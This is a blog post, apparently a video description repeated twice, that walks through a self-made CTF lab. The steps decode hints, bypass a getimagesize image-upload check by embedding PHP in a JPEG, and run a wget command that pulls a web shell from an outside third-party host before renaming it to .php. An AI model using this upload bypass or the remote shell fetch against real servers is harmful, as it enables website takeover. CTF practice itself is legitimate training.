1st Capture The Flag CTF Challenge Solution- 2016
Hi,
My Facebook Link: https://www.facebook.com/shaifullah01
Facebook Page: https://www.facebook.com/sqlibasic
My Blog: http://sqli-basic.blogspot.com/
**** all query I posted in videos description.
**** Please stay with me, subscribe, like & share my video if you are **** interested & get some knowledge.
My Facebook Link: https://www.facebook.com/shaifullah01
hello geek
what's up ?
I think better :D
I am black EyE from Bangladesh
At First take my Salam
:D
Today I wanna saw u Capture The Flag- CTF
Challenge Solution :D
Let's Go...
http://clginstitute.org/Rce/
This is my CTF LAB
WGZjWGp4WGZlWGL2WGZ1WGZlWGZ2WGZmWGZmWGZmWGZlWGL2
it's a hint's :D
lets try to decrypt :D
Try to Convert it ROT13
http://clginstitute.org/Rce//Rc3/lOl
Boobs
:P
Boobz :P :v
http://clginstitute.org//Rc3/lOl/bOObZZ
:p
:o :'
let's try with view-source :D
Go To : %4d%48%67%79%4e%54%4d%79%4e%6a%59%79%4e%54%4d%32%4d%7a%4d%79%4e%54%4d%33%4d%7a%51%79%4e%54%4d%32%4d%7a%59%79%4e%54%4d%79%4e%6a%59%3d
:V
we find :D
now our link is
http://clginstitute.org/Rce//ctf/
again :D
Now our link is
http://clginstitute.org/Rce//ctf/index2.php
in.php is my shell link :D
now we needed to upload shell :D
here factor with getimagesize variable
this variable always check it's image or not :D
now let's try to bypass with
1. exiftool
2. jhed tools
3. edjpgcom .exe :D
he he
can't open :p
both are same :D
now u put your shell code here :v
now i will put my cmd script in behind jpg :D
:v
:o
it's also work with jpg :o
let's try with php extention :D :v
File is an image - image/jpeg.The file 00.php has been uploaded.
:v :v he he. we success to upload our script :D
lets try to find it :/
:o where ? try to go upload page again
let's try to find upload directory :D
file path: /up3/your file name Here
our script is working :D
lets try :D
now try to upload our shell script
:D
3X.txt
cmd=wget http://www.sintrajud.org.br/userfiles/3X.txt
it's our command
now rename file 3X.txt to 3X.php
:D
we get our shell :D
now just put our condation :D
Capture your flage in main directory :D
go :D
thanks for watch my video
please subscribe us & also like my videos :D
Greetzz to All Muslime Hacker's
Allah Hafez
Take Care :D
All are text I put in the Description :D
Stay with me :D
**** all query I posted in videos description.
**** Please stay with me, subscribe, like & share my video if you are **** interested & get some knowledge.
My Facebook Link: https://www.facebook.com/shaifullah01
My Blog: http://sqli-basic.blogspot.com/
%%%%%%%%% Knowledge Should be Free %%%%%%%%%
It's an Online It Section
Please Subscribe us.
My Facebook Link: https://www.facebook.com/shaifullah01
Facebook Page: https://www.facebook.com/sqlibasic
My Blog: http://sqli-basic.blogspot.com/
**** all query I posted in videos description.
**** Please stay with me, subscribe, like & share my video if you are **** interested & get some knowledge.
My Facebook Link: https://www.facebook.com/shaifullah01
hello geek
what's up ?
I think better :D
I am black EyE from Bangladesh
At First take my Salam
:D
Today I wanna saw u Capture The Flag- CTF
Challenge Solution :D
Let's Go...
http://clginstitute.org/Rce/
This is my CTF LAB
WGZjWGp4WGZlWGL2WGZ1WGZlWGZ2WGZmWGZmWGZmWGZlWGL2
it's a hint's :D
lets try to decrypt :D
Try to Convert it ROT13
http://clginstitute.org/Rce//Rc3/lOl
Boobs
:P
Boobz :P :v
http://clginstitute.org//Rc3/lOl/bOObZZ
:p
:o :'
let's try with view-source :D
Go To : %4d%48%67%79%4e%54%4d%79%4e%6a%59%79%4e%54%4d%32%4d%7a%4d%79%4e%54%4d%33%4d%7a%51%79%4e%54%4d%32%4d%7a%59%79%4e%54%4d%79%4e%6a%59%3d
:V
we find :D
now our link is
http://clginstitute.org/Rce//ctf/
again :D
Now our link is
http://clginstitute.org/Rce//ctf/index2.php
in.php is my shell link :D
now we needed to upload shell :D
here factor with getimagesize variable
this variable always check it's image or not :D
now let's try to bypass with
1. exiftool
2. jhed tools
3. edjpgcom .exe :D
he he
can't open :p
both are same :D
now u put your shell code here :v
now i will put my cmd script in behind jpg :D
:v
:o
it's also work with jpg :o
let's try with php extention :D :v
File is an image - image/jpeg.The file 00.php has been uploaded.
:v :v he he. we success to upload our script :D
lets try to find it :/
:o where ? try to go upload page again
let's try to find upload directory :D
file path: /up3/your file name Here
our script is working :D
lets try :D
now try to upload our shell script
:D
3X.txt
cmd=wget http://www.sintrajud.org.br/userfiles/3X.txt
it's our command
now rename file 3X.txt to 3X.php
:D
we get our shell :D
now just put our condation :D
Capture your flage in main directory :D
go :D
thanks for watch my video
please subscribe us & also like my videos :D
Greetzz to All Muslime Hacker's
Allah Hafez
Take Care :D
All are text I put in the Description :D
Stay with me :D
**** all query I posted in videos description.
**** Please stay with me, subscribe, like & share my video if you are **** interested & get some knowledge.
My Facebook Link: https://www.facebook.com/shaifullah01
My Blog: http://sqli-basic.blogspot.com/
%%%%%%%%% Knowledge Should be Free %%%%%%%%%
It's an Online It Section
Please Subscribe us.
No comments